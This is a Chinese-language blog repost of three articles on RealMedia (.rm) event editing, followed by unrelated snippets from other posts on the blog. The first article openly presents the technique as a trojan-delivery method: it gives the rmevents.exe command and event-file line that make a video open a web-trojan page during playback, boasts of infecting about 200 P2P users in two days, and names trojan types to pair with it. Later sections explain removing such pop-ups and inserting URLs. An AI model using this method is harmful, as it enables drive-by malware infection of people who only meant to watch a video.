跳到主要內容

黑客隱蔽技巧:在Real影片中放置木馬

黑客隱蔽技巧:在Real影片中放置木馬



經常遇到rm影片播放時彈出網頁,一直不知道怎麼回事,前幾天看到了大眾軟體中一篇文章才知道插入和去除的方法,好東東不敢獨享,在網上搜了三篇相關文章,轉給大家拉!



  在Real影片中放 木馬在P2P軟體裡,很多的Real影片都是危險的,這只是一個小技巧,輔助的一種入侵方式,但這種方法很有效果,比如在著名的A片交流軟體PP點點通裡,我下了一個這樣的小 木馬 ,兩天就有200個目標物,並且呈幾何狀增長.大家別做壞事。 使用Helix Producer Plus 9的rmevents.exe來修改影片的剪輯訊息,可以在指定時間開啟指定的視窗.



  新增一個文本文件rmevents.txt. 輸入: u 00:01:00.0 00:01:30.0 http://yjs.bit.edu.cn/bbs 我來解釋一下,它意思是說在00:01:00.0 00:01:30.0這個時間範圍內開啟後面的URL,後面的URL就是我們的 木馬 位址。輸入rmevents -i 電影 .rm -e rmevents.txt -o 電影 1.rm 這個指令,產生的 電影 .rm就是我們的 木馬文件了。 http://yjs.bit.edu.cn/bbs 這個位址是你做好的網頁 木馬 的位址,不管是動鯊 木馬 啊,還是EXE2BMP的 木馬 ,還是什麼CHM 木馬 . 防禦方法更簡單,嘿嘿,不看 電影 就沒事了。要不就不用Realpalyer看吧,換別的播放器。



  去除realoneplay,裡的網頁問題 這個彈出的網頁是由一開始壓制影片的人壓進去的廣告頁。可以通過 Helix Producer Plus V9.01 的rmevents.exe編輯掉。



  方法一: 在你的安裝目錄C:\Program Files\Real\Helix Producer Plus\RealMediaEditor預設值是這個目錄,裡有一個rmevents.exe 在指令提示行cmd.exe下進入這個目錄,執行rmevents.exe 然後 建立一個內容為空的 events.txt 文件 rmevents -i input.rm -e events.txt -o output.rm input.rm為有廣告的原來的rmvb影片。 output.rm為轉換後的新影片名稱。 可以自訂。 這個相當於覆蓋掉原來的Event設定,對RMVB也有效。



  方法二: 直接執行C:\Program Files\Real\Helix Producer Plus\RealMediaEditor目錄下的rmedtgui.exe效果跟上面的指令提示行下是一樣的。執行rmedtgui.exe後,開啟有廣告的rmvb影片,選項表單裡的tools ——》merge events,開啟新增立的空白events.txt,再在file下選項save as儲存修改好的文件。 Helix Producer Plus V9.01在自由下載提供下載 教你在RM中插入網址 製作開始 先準備個正常的RM文件 下載個Helix Producer Plus 安裝。



  在準備個文本指令文件 文本指令如下 實例:在00:20.0(時分秒毫)—01:10.0時讓欣賞者自動彈出 http://yjs.bit.edu.cn/bbs 主頁 在03:10.0(時分秒毫)—03:59.0時讓欣賞者自動彈出 http://yjs.bit.edu.cn/bbs 主頁 1、編輯事件文件 新增一個記事本文件,命名為event.txt(可隨意),輸入以下內容: u 00:20.0 01:10.0 http://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http://yjs.bit.edu.cn/bbs 儲存碟後結束 解釋:u 表示URL事件, 00:20.0是起啟時間,01:10.0是結束時間,後面是指定的網頁.

  下一步 進入Helix Producer Plus的安裝目錄下的RealMediaEditor子目錄,雙按執行rmedtgui.exe文件,從file表單Open開啟一個Rm文件,從表單欄的tools(工具)中選項Merge Events(合併事件),在彈出的對話視窗中選項剛才編輯的event.txt文件,確定後Rmedtgui開始合併事件,合併結束後,請將含有事件文件的RM文件另行儲存。整個程序應當在15分鍾以內完成,還是相當快的。



  就是這麼簡單!

留言

這個網誌中的熱門文章

WUSON的CISSP課後筆記整理-葉柏毅Alex Yeh

  CISSP考試心得-Alex Yeh 心智圖 心智圖PDF Structure Architecture Framework Approach Methodology Domain 口訣 Domain 1. Security and Risk Management   C、I、A+GRC(安全和風險管理) Domain 2. Asset Security   盤點、分類、保護(資產安全) Domain 3. Security Architecture and Engineering   時時都安全、處處都安全(安全架構和工程) Domain 4. Communication and Network Security   處處都安全(通信及網路安全) Domain 5. Identity and Access Management (IAM)   I + 3A(身分識別及存取控制) Domain 6. Security Assessment and Testing   查驗、訪談、測試(安全評鑑及測試) Domain 7. Security Operations   日常維運、持續改善(安全維運) Domain 8. Software Development Security   時時都安全、處處都安全(軟體開發安全) 美國法定目標(FISMA)/ 資通安全法 CIA C機密性:資料不被偷 I完整性:資料不被竄改 A可用性:資料隨時可用 Integrity完整性 Data Integrity(資料完整性) Authenticity(資料真偽;真實性) Non-repudiation 不可否認性(法律上):傳送方不能否認未傳收;接受方不能否認未收到。 FISMA NIST FIPS 199 NIST SP 800 資產Asset:有價值Value的東西,且值得保護 Assets 通常指資訊系統 資料 電腦系統 操作系統 軟體 網路 資料中心(機房) 人(最重要) 業務流程 資安目標(定義): 透過安全管制措施,保護資訊資產不受到危害,以達到CIA目標 進而支持組織的業務流程 將安全融入組織業務流程(人事/採購),產銷人發財 支持組織的「產品」及「服務」持續交付 為公司創造價值,實現公司的使命及願景 公司最高經營階層的管理作為就叫做治理. 管理是達成目標的一套有系統的

低調的大提琴

低調的大提琴 靜靜默默的歌唱 在無人發現的角落 獨自低鳴 低調的大提琴 沉溺於寂靜旋律 在月光灑落的夜晚 與蟲鳴交響 低調的大提琴 在漆黑中死去 在幾個世紀後才被發現 卻未曾留在任何人心中 低調的大提琴 不善言語表達 用它的靈魂唱出心情 在人們仔細聆聽下綻放光彩

我的花店不賣薔薇(五)

日劇『沒有薔薇的花店』之文字特輯 呵呵~首先感謝忘年好友-任凱大哥的鼎力協助 由他精心挑選,劇集中精彩對話 『直哉:大哥你人好,我沒話說。不過嘛,這麼做到底妥不妥當? 小雫:什麼妥不妥當? 直哉:不會讓人家產生誤會嗎?她會覺得你對她有意思。 小雫:你的意思是讓爸爸不要對她太好? 直哉:這個我可沒說。在公車上給人讓個座之類的倒沒什麼,不過啊,這助人為樂的事要是做過了頭,有時候會在無意中傷害別人的。 小雫:不大懂。 直哉:她要是喜歡上大哥你的話,雖說是帶著魚子的柳葉魚,你怎麼說也是個單身男子,就算有想再婚的念頭也不奇怪。 小雫:你說誰是柳葉魚? 英治:我沒那種想法。 直哉:那誰說得準。或許她本來已經徹底放棄了戀愛、結婚,你卻給絕望中的人帶去希望,然後再對她說:「我就是心眼好,對人好是我的習慣」,那人家多可憐。 小雫:直哉的話也有道理。 直哉:怎麼說我也是做過牛郎的。女人心還不就那麼回事嘛。大哥該不會是……披著羊皮還帶著小孩的狼?這個時候就該說你是偽君子了。你對人好,你心裡舒服,但是總要考慮一下對方是怎麼想的。 英治:誰跟你說我心裡舒服了? 直哉:不過,大哥要是真想接受她,就又另當別論了,把她當做再婚對象看待的話。 英治:也沒這麼想。 直哉:說到底,你對她還是只有同情吧。』 被刺傷了這麼多次 也總是不懂,難道對人好,也是一種錯嗎 也或許就像直哉說的:「對人好,只是為了自己舒服,是一種習慣。」 總是想成為別人迷途羔羊的最後一道防線 企圖以壞人角色,來抵擋那最後的衝動 卻往往總是不夠仔細、不夠貼心,不懂得更深入著想,而兩敗俱傷 或是對我,不能感到全然地信任,害怕自己赤裸裸地被看穿,所以用盡全力來抗拒,來反擊 可惜我們不是在演日劇,你也不是非我不可 只是單純地想對這樣有緣認識,當朋友的人好 是這世界壞人太多嗎?還是我看起來就是心懷不軌^O^ 我是被動的 當你願意跟我聯繫、聊天 我亦會更用心回應 當你願意找我 我亦會更笑容迎接 當你給了我三分 我亦會回你五分 『信任、尊重與平等,是我們的默契。』